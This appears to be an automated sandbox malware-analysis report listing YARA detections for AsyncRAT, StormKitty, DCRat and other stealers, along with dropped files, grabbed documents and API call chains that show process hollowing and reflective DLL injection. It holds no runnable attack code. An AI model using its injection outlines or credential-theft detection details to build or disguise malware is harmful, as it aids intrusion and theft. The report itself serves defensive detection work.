                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED
                      Source: 4336.tmp.Server.exe.2.dr, DesktopScreenshot.cs.Net Code: Make
                      Source: 476D.tmp.Server.exe.2.dr, DesktopScreenshot.cs.Net Code: Make
                      Source: 4BC4.tmp.Client.exe.2.dr, Screen.cs.Net Code: GetScreen
                      Source: 4336.tmp.Server.exe.2.dr, Keylogger.cs.Net Code: SetHook
                      Source: 4336.tmp.Server.exe.2.dr, Keylogger.cs.Net Code: KeyboardLayout
                      Source: 476D.tmp.Server.exe.2.dr, Keylogger.cs.Net Code: SetHook
                      Source: 476D.tmp.Server.exe.2.dr, Keylogger.cs.Net Code: KeyboardLayout
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3CFE98 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0F3CFE98
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3FFFA0 SetClipboardData,2_2_0F3FFFA0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3D006C GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0F3D006C
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3CFE98 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0F3CFE98
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3D8D2C GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,_malloc_dbg,_malloc_dbg,_malloc_dbg,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,memcpy,memcpy,2_2_0F3D8D2C

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeFile deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.docx
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeFile deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.xlsx
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeFile deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KZWFNRXYKI.jpg
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeFile deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeFile deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx
                      Source: C:\Windows\System32\relog.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3D9884 memset,memset,OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,CloseHandle,CloseHandle,2_2_0F3D9884

                      Operating System Destruction

                      barindex
                      Source: C:\Windows\System32\relog.exeProcess information set: 00 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: dump.pcap, type: PCAPMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.2.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.0.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 2.2.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.2.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.0.explorer.exe.8b90000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.2.explorer.exe.f3c0000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.2.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.0.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                      Source: 2.0.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                      Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                      Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 2.2.explorer.exe.8b90000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 2.0.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.2.explorer.exe.c350000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 2.0.explorer.exe.c350000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                      Source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 2.2.explorer.exe.f3c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 00000018.00000002.3188525129.0000000005100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 00000018.00000002.3152328073.00000000029C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000013.00000002.3142832732.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                      Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 00000012.00000002.2045157680.0000000000787000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0000002D.00000002.2707163319.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000013.00000002.3187954223.000000001B234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                      Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 00000002.00000000.1786621795.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 0000000E.00000002.2061125065.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 0000002D.00000002.2773682295.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000000.1786520032.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000002.00000000.1790427329.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000012.00000002.2071994361.0000000002261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: Process Memory Space: 53A5.tmp.update.exe PID: 7508, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                      Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack, type: DROPPEDMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack, type: DROPPEDMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: Detects A310Logger Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: Detects A310Logger Author: ditekSHen
                      Source: 3CBD.tmp.Installer.exe.2.dr, CwkOLYwEiqNy.csLong String: Length: 12792
                      Source: 3CBD.tmp.Installer.exe.2.dr, CwkOLYwEiqNy.csLong String: Length: 29668
                      Source: 3CBD.tmp.Installer.exe.2.dr, CwkOLYwEiqNy.csLong String: Length: 12332
                      Source: accc.exe.5.dr, CwkOLYwEiqNy.csLong String: Length: 12792
                      Source: accc.exe.5.dr, CwkOLYwEiqNy.csLong String: Length: 29668
                      Source: accc.exe.5.dr, CwkOLYwEiqNy.csLong String: Length: 12332
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1832A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,0_2_00007FF68A1832A8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A183574 NtCreateSection,NtClose,0_2_00007FF68A183574
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A183614 wcsnlen,GetModuleHandleA,GetProcAddress,CreateProcessInternalW,NtMapViewOfSection,ResumeThread,0_2_00007FF68A183614
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1883E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,0_2_00007FF68A1883E8
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CBC55C CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,2_2_08CBC55C
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeCode function: 19_2_00007FFD9B5F31C5 NtProtectVirtualMemory,19_2_00007FFD9B5F31C5
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3383E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,47_2_00007FF6AA3383E8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3332A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,47_2_00007FF6AA3332A8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA333574 NtCreateSection,NtClose,47_2_00007FF6AA333574
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA333614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,47_2_00007FF6AA333614
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B032A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,52_2_00007FF7C9B032A8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B03614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,52_2_00007FF7C9B03614
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B03574 NtCreateSection,NtClose,52_2_00007FF7C9B03574
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B083E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,52_2_00007FF7C9B083E8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE483574 NtCreateSection,NtClose,53_2_00007FF7AE483574
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE483614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,53_2_00007FF7AE483614
